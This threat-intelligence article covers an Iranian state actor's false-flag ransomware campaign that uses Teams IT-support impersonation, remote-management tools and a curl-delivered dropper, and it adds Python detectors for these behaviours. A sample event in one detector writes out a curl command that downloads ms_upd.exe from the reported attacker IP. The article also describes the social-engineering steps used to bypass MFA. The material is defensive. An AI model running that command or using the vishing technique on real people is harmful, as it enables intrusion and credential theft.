MuddyWater Weaponizes Microsoft Teams in False Flag Ransomware Operation

Threat Actor: MuddyWater
Aliases: Mercury · SeedWorm · Cobalt Ulster · Static Kitten
Origin: Iran
Affiliation: MOIS (Ministry of Intelligence)
Primary Targets: Middle East governments, telecoms, defense, critical infrastructure
Active Since: ~2017
Current TTPs: Teams-based credential harvesting, false flag ransomware, RMM persistence
Motivation: Espionage · Long-term persistence · Attribution obfuscation

Iranian state-sponsored threat actor MuddyWater has executed a sophisticated false flag ransomware campaign that weaponizes Microsoft Teams for credential harvesting while masquerading as the Chaos ransomware-as-a-service operation. Rapid7 identified the early 2026 attack, which abandoned traditional file encryption in favor of data exfiltration and long-term network persistence using commercial remote management tools.

The operation represents a deliberate attribution-muddying strategy in which state-backed operators borrow cybercrime infrastructure and methods to obscure their origins. MuddyWater—also tracked as Mango Sandstorm, Seedworm, and Static Kitten—has increasingly adopted off-the-shelf criminal tools and ransomware affiliate programs to provide operational cover for intelligence collection and destructive attacks serving Iranian strategic objectives.

Teams-Based Social Engineering Attack Chain

The attack sequence begins with unsolicited Microsoft Teams chat requests to employees, with threat actors impersonating IT support personnel. Attackers used interactive screen-sharing sessions to observe victims directly and talk them through weakening their own security controls. During these sessions, operators harvested credentials and bypassed multi-factor authentication by instructing users to type their credentials into locally created text files while the screen was being shared.

Once initial access was established through compromised user accounts, MuddyWater deployed legitimate remote access tools including DWAgent and AnyDesk for persistent access. The threat actor executed reconnaissance commands, accessed VPN configuration files, and moved laterally through the environment before exfiltrating data. The victim received ransom demands via email despite no file encryption occurring—maintaining the ransomware facade while prioritizing intelligence collection.

Immediate Actions Required

Disable external Teams chat requests for users not requiring this functionality. Implement conditional access policies restricting screen-sharing capabilities. Monitor for unauthorized deployment of remote management tools including AnyDesk, DWAgent, Microsoft Quick Assist, and similar utilities.

Custom Malware Deployment Infrastructure

Beyond commercial tools, the campaign deployed custom malware through a multi-stage infection chain initiated via RDP sessions. Attackers downloaded an executable (ms_upd.exe) from external infrastructure at 172.86.126[.]208 using the curl utility. This dropper, designated Stagecomp by researchers, collected system information and contacted command-and-control servers to deliver secondary payloads including a bespoke remote access trojan.
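The monitoring recommended above and the curl download described in this paragraph are both visible in process-creation telemetry. The following is an added example, not code from the Rapid7 report or this article: the binary names, event field names and sample events are assumptions constructed for illustration.

```python
import ipaddress
import re
# Assumed binary names for the tools the report lists; adjust to your estate.
RMM_IMAGES = {"anydesk.exe", "dwagent.exe", "quickassist.exe"}
APPROVED_RMM = set()  # RMM tools your organization sanctions (constructed: none)
URL_RE = re.compile(r"https?://([^/\s:]+)\S*", re.IGNORECASE)

def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_rmm(event):
    """Flag execution of a remote-management binary not on the approved list."""
    image = _basename(event["Image"])
    if image in RMM_IMAGES and image not in APPROVED_RMM:
        return f"unapproved RMM tool executed: {image}"
    return None

def check_curl_dropper(event):
    """Flag curl fetching an .exe from a bare public IP (the ms_upd.exe shape)."""
    if _basename(event["Image"]) != "curl.exe":
        return None
    cmd = event["CommandLine"]
    m = URL_RE.search(cmd)
    try:  # a DNS-name host raises ValueError and is left to other controls
        public_ip = bool(m) and ipaddress.ip_address(m.group(1)).is_global
    except ValueError:
        public_ip = False
    if public_ip and ".exe" in cmd.lower():
        return f"curl download of executable from IP literal: {m.group(1)}"
    return None

def detect(events):
    """Run every check over each event and return one alert per match."""
    alerts = []
    for i, ev in enumerate(events):
        for check in (check_rmm, check_curl_dropper):
            msg = check(ev)
            if msg:
                alerts.append({"event": i, "user": ev["User"], "alert": msg})
    return alerts

# Constructed Sysmon-style events: the report's curl shape, an AnyDesk launch
# from Downloads, and a benign curl to a DNS name that must not fire.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\curl.exe", "User": "CORP\\jdoe",
     "CommandLine": r"curl http://172.86.126.208/ms_upd.exe -o C:\Users\Public\ms_upd.exe"},
    {"Image": r"C:\Users\jdoe\Downloads\AnyDesk.exe", "User": "CORP\\jdoe",
     "CommandLine": r"C:\Users\jdoe\Downloads\AnyDesk.exe"},
    {"Image": r"C:\Windows\System32\curl.exe", "User": "CORP\\svc_build",
     "CommandLine": "curl https://updates.example.com/agent.exe -o agent.exe"},
]
```

Populate APPROVED_RMM from your sanctioned-software inventory; the point of the check is that an RMM install outside that list, initiated from a user's Downloads folder, is the behaviour to investigate.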

The custom RAT, designated Darkcomp, masquerades as a legitimate Microsoft WebView2 application by trojanizing the official Microsoft WebView2APISample project. The malware maintains command and control by polling its C2 server every 60 seconds in an infinite loop, enabling operators to execute commands, run PowerShell scripts, perform file operations, and spawn interactive shells. The RAT reads its C2 details from an encrypted configuration file (visualwincomp.txt), indicating a degree of operational security awareness.
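A fixed 60-second polling loop is an observable that network telemetry can key on. The following is an added example, not code from the report or this article, that finds near-constant-interval outbound connections in a constructed log format ("<ISO-8601 time> <src> <dst>"); the thresholds and sample IPs are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median, pstdev

MIN_CONNECTIONS = 6     # enough samples to judge regularity
MAX_JITTER_RATIO = 0.1  # stdev / median of the gaps; 0 means perfectly periodic

def parse_log(lines):
    """Group connection timestamps by (source, destination). Format is the
    constructed '<ISO-8601 time> <src> <dst>' used in SAMPLE_LOG below."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst = line.split()
        flows[(src, dst)].append(datetime.fromisoformat(ts))
    return flows

def find_beacons(lines, min_connections=MIN_CONNECTIONS, max_jitter=MAX_JITTER_RATIO):
    """Return flows whose inter-connection gaps are nearly constant."""
    hits = []
    for (src, dst), times in parse_log(lines).items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med <= 0:  # bursts with identical timestamps are not a beacon
            continue
        jitter = pstdev(gaps) / med
        if jitter <= max_jitter:
            hits.append({"src": src, "dst": dst, "interval_s": round(med),
                         "count": len(times), "jitter": round(jitter, 3)})
    return hits

def _constructed_log():
    """Eight check-ins at exactly 60 s to one host, plus irregular browsing
    from the same workstation to another host (documentation IPs)."""
    start = datetime(2026, 3, 2, 9, 0, 0)
    beacon = [f"{(start + timedelta(seconds=60 * i)).isoformat()} 10.10.4.23 198.51.100.77"
              for i in range(8)]
    browsing = [f"{(start + timedelta(seconds=s)).isoformat()} 10.10.4.23 203.0.113.10"
                for s in (0, 3, 17, 18, 95, 140, 141, 400)]
    return beacon + browsing

SAMPLE_LOG = _constructed_log()

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Many legitimate agents (update clients, collaboration tools) also poll on fixed timers, so treat the output as a triage list to compare against known destinations rather than an alert on its own.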

Attribution Indicators and Historical Context

Attribution to MuddyWater stems from multiple indicators, most notably the use of a code-signing certificate attributed to "Donald Gay" to sign the ms_upd.exe dropper. This certificate has appeared in previous MuddyWater operations, providing continuity across campaigns. The operational profile aligns with documented MuddyWater tactics including the abuse of legitimate tools, social engineering focus, and strategic targeting.

This is not MuddyWater's first ransomware operation. In September 2020, the group targeted Israeli organizations with the PowGoop loader, which deployed destructive Thanos ransomware variants. In 2023, Microsoft observed MuddyWater collaborating with DEV-1084 to conduct destructive attacks under the DarkBit ransomware persona. As recently as October 2025, the group allegedly used Qilin ransomware against an Israeli government hospital, demonstrating continued investment in ransomware-as-cover tactics.

Strategic Analysis

MuddyWater's adoption of ransomware affiliate programs serves dual purposes: plausible deniability for state-sponsored operations and operational enablement through access to established criminal infrastructure. As Check Point noted, participation in programs like Qilin provides both cover and meaningful operational advantages, particularly as target nations heighten security measures against known Iranian threat actors.

Chaos RaaS Exploitation

The Chaos ransomware-as-a-service operation emerged in early 2025 and operates a traditional affiliate program advertised on cybercrime forums including RAMP and RehubCom. The group employs double extortion combining data theft with encryption threats, and has demonstrated triple extortion capabilities through DDoS threats. Rapid7 identified quadruple extortion tactics including threats to contact customers and competitors to increase victim pressure.

As of late March 2026, Chaos claimed 36 victims on its data leak site, with the majority located in the United States. Primary target sectors include construction, manufacturing, and business services. The group's standard attack methodology involves mail flooding and vishing via Teams, impersonating IT support to trick victims into installing remote access tools, then escalating to ransomware deployment. MuddyWater's hijacking of this methodology while substituting intelligence collection for encryption demonstrates sophisticated understanding of criminal operations.

Defense Recommendations

Organizations should treat apparent ransomware incidents with heightened scrutiny when targeting patterns, victim selection, or technical indicators suggest strategic rather than financial motivation. The convergence of state-sponsored operators with cybercrime infrastructure complicates attribution and incident response, requiring security teams to maintain awareness of both criminal and nation-state threat actor methodologies regardless of initial attack presentation.
